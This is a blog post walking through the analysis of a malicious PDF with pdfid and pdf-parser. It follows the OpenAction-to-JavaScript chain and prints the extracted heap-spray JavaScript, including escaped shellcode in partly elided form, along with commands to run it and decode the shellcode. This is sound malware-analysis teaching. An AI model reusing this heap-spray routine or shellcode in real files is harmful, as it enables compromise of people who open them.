Malware PDF. Analysis of a very simple sample.

Initial Analysis

“You can’t trust anybody these days”, people use to say. Well, this is specially true with PDF files :)

Reading this awesome article in Corelan Blog, where they discuss the analysis of the infamous Zeus Botnet, I realised that being able to analyze the PDF format in order to isolate the malicious code is an important skill for a security professional nowadays.

Actually I had this on my mind for a long time but I always found a reason to postpone it. But after reading the Corelan guys’ article I decided “I want to play too!” :)

Of course, the first thing I needed was a malicious PDF sample. For that reason, I contacted Mila Parkour (she runs the Contagio Blog) and she provide me with some juicy ones. Thanks Mila, you’re awesome!

The second thing I needed was some kind of specialized tools, I didn’t want to hexdump the whole thing :)

The obvious choice were the pdftools from Didier Stevens. What else?

I’ll use the following PDF “European Security Treaty-1.pdf” which actually has nothing to do with it and apparently has a russian procedence. Surprise!

Let’s start checking the objects inside the PDF file with pdfid.py

PDF files are composed of objects forming a tree structure, that means, objects can (and will) reference other objects. It’s important to keep in mind this.

pdfid.py will show a preliminary view of these objects inside the PDF.

root@bt:~/pdf_malware/case_study# pdfid.py European Security Treaty-1.pdf.evil
PDFiD 0.0.11 European Security Treaty-1.pdf.evil
PDF Header: %PDF-1.4
obj                   48
endobj                48
stream                12
endstream             12
xref                   2
trailer                2
startxref              2
/Page                  1
/Encrypt               0
/ObjStm                0
/JS                    1
/JavaScript            2

/AA                    0
/OpenAction            1
/AcroForm              0
/JBIG2Decode           0
/RichMedia             0
/Launch                0
/Colors > 2^24         0

Something fishy here… The PDF has only one page, this is OK. There are several JavaScript objects inside… this is not that OK. There is an OpenAction object which (presumably) will execute this malicious javascript… too many coincidences.

In order to understand the PDF’s execution flow we need to somehow reconstruct the object tree. Since this could be very complicated with complex documents and we are “praxis orientated”, let’s do it from the branches to the top, starting from the javascript objects (the interesting ones ;))

Let’s start searching for /JS and /JavaScript objects (both are kind of synonyms actually).

root@bt:~/pdf_malware/case_study# pdf-parser.py –search javascript European Security Treaty-1.pdf.evil
obj 12 0
Type:
Referencing: 1 0 R, 13 0 R
[(2, ‘<<‘), (2, ‘/Dests’), (1, ‘ ‘), (3, ‘1’), (1, ‘ ‘), (3, ‘0’), (1, ‘ ‘), (3, ‘R’), (2, ‘/JavaScript’), (1, ‘ ‘), (3, ’13’), (1, ‘ ‘), (3, ‘0’), (1, ‘ ‘), (3, ‘R’), (2, ‘>>’), (1, ‘r’)]

<<
/Dests 1 0 R
/JavaScript 13 0 R
>>

obj 14 0
Type: /Action
Referencing: 15 0 R
[(2, ‘<<‘), (2, ‘/S’), (2, ‘/JavaScript’), (2, ‘/JS’), (1, ‘ ‘), (3, ’15’), (1, ‘ ‘), (3, ‘0’), (1, ‘ ‘), (3, ‘R’), (2, ‘/Type’), (2, ‘/Action’), (2, ‘>>’), (1, ‘r’)]

<<
/S /JavaScript
/JS 15 0 R
/Type /Action
>>

As we can see, there are two objects (12 and 14) referencing two javascript objects (13 and 15). What about the /JS objects?

root@bt:~/pdf_malware/case_study# pdf-parser.py –search js European Security Treaty-1.pdf.evil
obj 14 0
Type: /Action
Referencing: 15 0 R

[(2, ‘<<‘), (2, ‘/S’), (2, ‘/JavaScript’), (2, ‘/JS’), (1, ‘ ‘), (3, ’15’), (1, ‘ ‘), (3, ‘0’), (1, ‘ ‘), (3, ‘R’), (2, ‘/Type’), (2, ‘/Action’), (2, ‘>>’), (1, ‘r’)]

<<
/S /JavaScript
/JS 15 0 R
/Type /Action
>>

This is the same object 14 as before and it looks like this is the important one, since this is of the /Action type. /Action objects perform some “action ;)” when the page is displayed, in this case, executing the javascript code.

So I will focus on object 14, but just to leave this topic closed, I would like to check what’s with object 12.

Object 12 has no known type (at least not recognized by the tool) and is referencing javascript object 13. Let’s check this one.

root@bt:~/pdf_malware/case_study# pdf-parser.py –object 13 European Security Treaty-1.pdf.evil
obj 13 0
Type:
Referencing: 14 0 R
[(2, ‘<<‘), (2, ‘/Names’), (2, ‘[‘), (2, ‘(‘), (3, ‘heapspray’), (2, ‘)’), (3, ’14’), (1, ‘ ‘), (3, ‘0’), (1, ‘ ‘), (3, ‘R’), (2, ‘]’), (2, ‘>>’), (1, ‘r’)]

<<
/Names [(heapspray)14 0 R]
>>

It turns out, this object 13 is just a reference to the /Action object 14 (which in turn references the /JavaScript object 15). This is actually what is called a reference to name dictionary. This is not relevant, just a mapping between names and objects.

Interesting is, however, that the name is “heapspray“. I can tell you something about the Malware authors… they are NOT subtle ;)

Recapitulation

So, where were we? All this issue with the objects and reference was a bit confusing…

What we know until now about the execution flow is this:

12 —-> 13 (name dict) —-> 14 (action) —-> 15 (javascript).

The object 12 is referenced directly from the Root of the tree itself (10 0), as we can confirm checking the references to object 12:

root@bt:~/pdf_malware/case_study# pdf-parser.py –reference 12 European Security Treaty-1.pdf.evil
obj 10 0
Type: /Catalog
Referencing: 12 0 R, 7 0 R, 6 0 R, 11 0 R
[(2, ‘<<‘), (2, ‘/PageMode’), (2, ‘/UseOutlines’), (2, ‘/Names’), (1, ‘ ‘), (3, ’12’), (1, ‘ ‘), (3, ‘0’), (1, ‘ ‘), (3, ‘R’), (2, ‘/Metadata’), (1, ‘ ‘), (3, ‘7’), (1, ‘ ‘), (3, ‘0’), (1, ‘ ‘), (3, ‘R’), (2, ‘/Pages’), (1, ‘ ‘), (3, ‘6’), (1, ‘ ‘), (3, ‘0’), (1, ‘ ‘), (3, ‘R’), (2, ‘/OpenAction’), (1, ‘ ‘), (3, ’11’), (1, ‘ ‘), (3, ‘0’), (1, ‘ ‘), (3, ‘R’), (2, ‘/Type’), (2, ‘/Catalog’), (2, ‘>>’), (1, ‘r’)]

<<
/PageMode /UseOutlines
/Names 12 0 R
/Metadata 7 0 R
/Pages 6 0 R
/OpenAction 11 0 R
/Type /Catalog
>>

This was interesting in order to understand how the malicious javascript gets executed… but let’s check the payload itself, shall we?

The Payload

root@bt:~/pdf_malware/case_study# pdf-parser.py –object 15 European Security Treaty-1.pdf.evil
obj 15 0
Type:
Referencing:
Contains stream
[(2, ‘<<‘), (2, ‘/Length’), (1, ‘ ‘), (3, ‘1093’), (2, ‘/Filter’), (2, ‘/FlateDecode’), (2, ‘>>’)]

<<
/Length 1093
/Filter /FlateDecode
>>

So this object contains a compressed data stream. In PDF jargon, a filter is a method, specifying how the data must be decoded in order to be usable again. In this case, the method is /FlateDecode (zlib/deflate).

Fortunately, pdf-parser.py handles this as well through the –filter modifier.

root@bt:~/pdf_malware/case_study# pdf-parser.py –object 15 –filter –raw European Security Treaty-1.pdf.evil
obj 15 0
Type:
Referencing:
Contains stream
<</Length 1093/Filter/FlateDecode>>

<<
/Length 1093
/Filter /FlateDecode
>>

var unes=unescape;
function rep(count,what){
var v = “”;
while (–count >= 0) v += what;
return v;
}
function myunes(buf) {
var ret=”;
for (var x=0;x < buf[“x6cx65x6ex67x74x68”]; x+=2) {
ret += util[“x62x79x74x65x54x6fx43x68x61x72”](Number(‘0x’+buf.substr(x,2)));//
}
return ret;
}
var sc=unes(“%u4341%u4b49%u11EB%u5BFC%u334B%u66C9%ub0B9%u8001%u0B34%uE2f9″+
“%uEBFA%uE805%uFFEB%uFFFF%uF911%uF9F9%uA3F9%u72AC%u7815%u9D15%uF9FD%u72F9″+
“%u110D%uF869%uF9F9%u0172%u1611%uF9F9%u70F9%u06FF”+
“%u91CF%u6254%u2684%uED11%uF9F8%u70F9%uF5BF%uCF06″+
“%uD091%u3FEB%u11AF%uF8FC%uF9F9%uBF70%u06E9%u91CF”+
“%uC5A0%u82FE%u0F11%uF9F9%u70F9%uEDBF%uCF06%u8791″+
“%u1B21%u118A%uF91E%uF9F9%uBF70%uCACD%u1230%u72FA”+
“%uC5B7%u387A%uA8FD%uF993%u06A8%uF5AF%u7AA0%u0601″+
“%u098D%uB9C4%uF9E6%u8FF9%u7010%uC5B7%uF993%uF993″+
“%uF993%uFB93%uF993%u8F06%u06C5%uE9AF%uBF70%u7ABD”+
[…]
“%uB0B0%uB0B0%uCD78%u17F1%u0707%u7C16%u8C30%uA608″+
“%u06A7%uC58F%u8F06%u06B1%uBD8F%u1906%uAFAC%u589D”+
“%uF9C9%uF9F9%u397C%uEA81%u72C7%uF5B9%u72C7%uE589″+
“%u72C7%uF1A7%uC754%u9172%u12F1%uC7F4%uB972%uC7CD”+
“%u5172%uF941%uF9F9%u22CA%u3C72%uA4A7%uFD3B%uAAF9″+
“%uAFAC%uCFAE%u9572%uE1DD%u72CF%uC5BC%u72CF%uFCAD”+
“%uFA81%uC72C%uB372%uC7E1%uA372%uFAD9%u1A24%uB0C5″+
“%u72C7%u72CD%u0CFA%u06CA%uCA05%u5539%u3DC3%uFE8D”+
“%u3638%uFAF4%u1201%uCF0B%u85C2%uEDDD%u268C%u3B72″+
“%u397A%uC7DD%uE172%u24FA%uC79F%uF572%uC7B2%uA372″+
“%uFAE5%uC724%uFD72%uFA72%u123C%uCAFB%u7239%uA62C”+
“%uA4A7%u3BA2%uF9F1%uF911%uF9F9%uA1F9%u397A%u3AFC”);

function exp() {

blah = rep(128, unes(“%u4242%u4242%u4242%u4242%u4242”)) + sc;
bbk = unes(“%u0c0c%u0c0c”);
wap = 20+blah[“x6cx65x6ex67x74x68”];
while (bbk[“x6cx65x6ex67x74x68”]<wap) bbk+=bbk;
fillbk = bbk[“x73x75x62x73x74x72x69x6ex67”](0, wap);
bk = bbk[“x73x75x62x73x74x72x69x6ex67”](0, bbk[“x6cx65x6ex67x74x68”]-wap);
while(bk[“x6cx65x6ex67x74x68”]+wap<0x80000) bk = bk+bk+fillbk;
mm = new Array();
for (i=0;i<200;i++) mm[i] = bk + blah;
}
exp();

Niiiicccceee, the javascript is barely obfuscated! The authors applied just some dumb-ass techniques, like writing the name of important variables in hex. For example “x6cx65x6ex67x74x68” is actually the word “length”. Let’s get rid of these annoyances.

After substituting, the javascript looks more familiar :)

function rep(count,what){
var v = “”;
while (–count >= 0) v += what;
return v;
}
function myunes(buf) {
var ret=”;
for (var x=0;x < buf.length; x+=2) {
ret += util.byteToChar(Number(‘0x’+buf.substr(x,2)));//
}
return ret;
}
var sc=unescape(“%u4341%u4b49%u11EB%u5BFC%u334B%u66C9%ub0B9%u8001%u0B34%uE2f9″+
“%uEBFA%uE805%uFFEB%uFFFF%uF911%uF9F9%uA3F9%u72AC%u7815%u9D15%uF9FD%u72F9″+
“%u110D%uF869%uF9F9%u0172%u1611%uF9F9%u70F9%u06FF”+
“%u91CF%u6254%u2684%uED11%uF9F8%u70F9%uF5BF%uCF06″+
[…]
“%uFAE5%uC724%uFD72%uFA72%u123C%uCAFB%u7239%uA62C”+
“%uA4A7%u3BA2%uF9F1%uF911%uF9F9%uA1F9%u397A%u3AFC”);

function exp() {

blah = rep(128, unescape(“%u4242%u4242%u4242%u4242%u4242”)) + sc;
bbk = unescape(“%u0c0c%u0c0c”);
wap = 20+blah.length;
while (bbk.length<wap) bbk+=bbk;
fillbk = bbk.substring(0, wap);
bk = bbk.substring(0, bbk.length-wap);
while(bk.length+wap<0x80000) bk = bk+bk+fillbk;

mm = new Array();
for (i=0;i<200;i++) mm[i] = bk + blah;
}
exp();

This is a “Skyline” heap overflow off the book. Not a surprise, since this is the most used Heap Spray technique today…

As you can see, the variable sc contains the shellcode and it’s not mangled in the sequence of “arithmetic” operations at the end of the script. These operations create the slide of the heap spray (the long part that isn’t shellcode).

In case we needed to take a look at the whole payload, we would need to actually execute the payload and check the variable bk. We could easily do this with SpiderMonkey, like this:

root@bt:~/pdf_malware/case_study# js -f shellcode.js -f –
js> print(bk.length);
523398

js> escape(bk);

%u0C0C%u0C0C%u0C0C%u0C0C%u0C0C%u0C0C%u0C0C
[…]

%u0C0C%u0C0C%u0C0C%u0C0C%u0C0C%u0C0C%u0C0C
%u0C0C%u0C0C%u0C0C%u0C0C%u0C0C%u0C0C%u0C0C
%u0C0C%u0C0C%u0C0C

Also, we have confirmed that this PDF is indeed malicious, we extracted the JavaScript on it and even got the shellcode.

A further analysis would involve some static analysis of the shellcode, which we could decode like this to its binary form.

$ perl -pe ‘s/%u(..)(..)/chr(hex($2)).chr(hex($1))/ge’ < shellcode.js > shellcode.raw

But this will be another story…

 

319 828 534 116

Advertisements

3 thoughts on “Malware PDF. Analysis of a very simple sample.

  1. I have similar js using util.byteToChar function, but SpiderMonkey requires me to create an object to handle this function. I try google but no luck, any hints?

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s